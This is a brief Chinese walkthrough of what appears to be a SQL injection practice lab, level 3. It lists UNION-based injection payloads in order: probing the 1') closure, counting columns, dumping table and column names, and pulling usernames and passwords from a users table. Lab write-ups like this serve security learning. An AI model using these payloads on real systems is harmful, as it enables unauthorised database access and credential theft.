第三关和前面两关没有太大的区别,只是数据访问的方式不一样
1、判断是否存在注入点
1') and 1=1 -- qq
1') and 1=2 -- qq
第三关和前两关的区别在于查询数据的方式是1'),注意-- qq之间一定要有空格,网页编译中--空格代表注释,意在将后面的内容注释掉
2、判断字段数
1') order by 3-- qq
1') order by 4-- qq
3、判断回显点
0') union select 1,2,3 -- qq
4、查询数据库版本号和当前数据库名
0') union select 1,database(),version() -- qq
5、爆表
0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() -- qq
6、爆字段名
0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- qq
7、查询表格内容
0') union select 1,group_concat(username),group_concat(password) from users -- qq
@-@